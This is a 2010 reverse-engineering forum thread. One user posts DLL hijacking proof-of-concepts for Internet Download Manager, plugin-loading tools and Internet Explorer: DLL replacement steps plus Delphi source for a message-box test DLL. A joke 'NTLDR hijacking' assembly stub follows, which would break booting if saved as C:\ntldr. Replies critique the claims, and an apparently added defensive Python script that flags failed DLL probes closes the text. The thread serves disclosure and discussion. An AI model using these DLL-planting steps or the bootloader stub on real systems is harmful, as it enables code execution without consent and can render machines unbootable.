A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #2673  by STRELiTZIA
 Tue Sep 07, 2010 4:57 pm
Hi,

IDM Dll Hijacking Exploit:
Exploit Title: [Dll Hijacking Exploit]
Application: [Internet Download Manager module(idmmkb.dll) Tonec Inc.]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [All Internet Download Manager release]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Internet Download Manager module (idmmkb.dll) is a monitor for special keys (Alt, Ctrl, etc.) and for mouse clicks on web links in Internet Browsers.
That allows other applications' dynamic link libraries to execute malicious code without the user's consent,
in the privilege context of the targeted application.

Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"

Perform these tests:
-------------------
- Restart your system.
- Try to run Windows Internet Explorer or Mozilla Firefox.
- Try to open your folders and links located on your Desktop (My Computer, Recycle Bin, My Documents and others...)
- Choose any Link property and click Find target.

Test Dll Delphi Source:
---//---
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---
Plugin Dll Hijacking Exploit:
Exploit Title: [Dll Hijacking Exploit]
Application: [Application plugin support]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [%Applications list%]
Tested on: [Windows Xp, Vista, Windows 7]

Description:
------------
Allows other applications' dynamic link libraries to execute malicious code without the user's consent,
in the privilege context of the targeted application.


Applications list: (Tested)
-----------------
PEiD
FastScanner
ExeInfoPE
Stud_PE
PE Explorer
OllyDbg
IDA Pro (*.plw)
notepad++
Hex Workshop
Foxit Reader
PhotoFiltre Studio X
VLC Media player
Import REConstructor
PE Tools by NEOx
DiE- DETECT iT EASY

Instructions:
-------------
1- Copy "Test.dll" into "Application\%plugin%"

Perform these tests:
-------------------
- Launch Application.

Test Dll Delphi Source:
---//---
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---
Regards.
 #2680  by ssj100
 Wed Sep 08, 2010 4:50 am
Thanks for this. I'll see if it works for me.

EDIT: cool, confirmed working in Windows XP SP3, with Foxit Reader version 3.2.
 #2681  by GamingMasteR
 Wed Sep 08, 2010 6:09 am
Hi STR,

IDM is widespread and the exploit can be widely used.
But regarding the plugin system hijacking, does the attacker have to search the disk for those applications, as they are often used in portable forms (not installed in Program Files like PEiD/OllyDbg/IDA/...)?!

I think there's no way for application developers to check if loaded plugins are safe or not, it's the user's responsibility :)

Best Regards.
 #2683  by EP_X0FF
 Wed Sep 08, 2010 6:24 am
Well, code signing can help.
 #2700  by STRELiTZIA
 Wed Sep 08, 2010 5:39 pm
Hi,

Another one, I think I'll go around all installed applications in my system :mrgreen:

Internet Explorer Dll Hijacking Exploit
====================================================
= INTERNET EXPLORER DLL HIJACKING EXPLOIT =
====================================================

Exploit Title : [Internet Explorer Dll Hijacking Exploit]
Date : [08 Sept 2010]
Author : [STRELiTZIA]
Software : [INTERNET EXPLORER]
Tested on : [Windows Xp SP3 + Office 2007]

============================
= Description =
============================
Internet Explorer loads the %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
A vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.


============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".

============================
= Tests =
============================
- Launch Internet Explorer.


============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission.'),
PChar('Sample'),
MB_ICONSTOP
);
end.
 #2715  by Cr4sh
 Thu Sep 09, 2010 6:08 pm
Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"
============================
= Instructions =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".
WTF is all this shit? How exactly is it related to the real attack vectors?

PS:
;
; !!!0DAY!!! !!!0DAY!!! !!!0DAY!!!
; NTLDR Hijacking Exploit
;
; 1. Compile the following asm code
; 2. Save as C:\ntldr
; 3. Reboot your box
;

mov si, message
.loop:
lodsb
test al, al
jz .end
mov ah, 0x0e
int 0x10
jmp short .loop
.end:
jmp .end
message db "You are hecked!",0
 #2716  by Alex
 Thu Sep 09, 2010 7:34 pm
WTF is all this shit? How exactly is it related to the real attack vectors?
Yes, if you have admin privileges you can overwrite all DLLs and this can't be classified as a vulnerability. The best example of this kind of vulnerability is the case when software loads DLLs from the current directory while opening, for example, a *.jpg file, instead of loading them from the System32/Program Files directories. It's almost like the case of the LNK vulnerability and memory sticks, but the user has to open a file to trigger the DLL loading.
 #2717  by EP_X0FF
 Fri Sep 10, 2010 1:34 am
If you do some profiling with FileMon/DW, for example, you can watch that many applications are trying to load nonexistent DLLs (for example Dr.Web in the past).
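One way to turn that profiling idea into a repeatable check, as an added example that is not code from this thread: a Python script that reads a Process Monitor CSV export (the column names are those Procmon uses; the sample rows below are constructed, not a real capture) and lists every failed DLL probe that happened outside the protected system directories, which is exactly the list of load locations a developer should stop searching or an administrator should make sure is not writable by ordinary users.

```python
import csv
import io

# Constructed sample of a Process Monitor CSV export (not a real capture):
# a browser probing for idmmkb.dll next to its own binary before falling back
# to System32, and a plugin host that finds one plugin and misses another.
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","iexplore.exe","1234","CreateFile","C:\\Program Files\\Internet Explorer\\idmmkb.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:01:02.2","iexplore.exe","1234","CreateFile","C:\\Windows\\System32\\idmmkb.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:01:02.3","iexplore.exe","1234","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Data"
"10:01:03.0","peid.exe","2345","CreateFile","D:\\tools\\PEiD\\plugins\\test.dll","SUCCESS","Desired Access: Read Data"
"10:01:03.1","peid.exe","2345","CreateFile","D:\\tools\\PEiD\\plugins\\missing.dll","NAME NOT FOUND","Desired Access: Read Data"
"""

# Directories where a failed probe is the normal end of the search order,
# not a place an unprivileged user can drop a file (lower-case for matching).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def find_hijackable_dll_probes(csv_text):
    """Return (process name, path) pairs for every CreateFile on a *.dll
    that ended in NAME NOT FOUND outside the system directories.

    Each pair is a directory the process searches before it finds (or gives
    up on) the library, so it is where a planted file would be picked up
    first: the fix is to stop probing there or to lock the directory down."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"]
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        if not path.lower().endswith(".dll"):
            continue
        if path.lower().startswith(SYSTEM_DIRS):
            continue  # expected fallback probe, not an exposure
        hits.append((row["Process Name"], path))
    return hits


def report(csv_text):
    """Group the findings per process so the output reads like a to-do list."""
    per_process = {}
    for process, path in find_hijackable_dll_probes(csv_text):
        per_process.setdefault(process, []).append(path)
    return per_process


if __name__ == "__main__":
    for process, paths in report(SAMPLE_PROCMON_CSV).items():
        print(process)
        for p in paths:
            print("   probes for missing DLL:", p)
```

On a real system, export a Procmon capture filtered to CreateFile events with Result "NAME NOT FOUND" and pass the file's text to report().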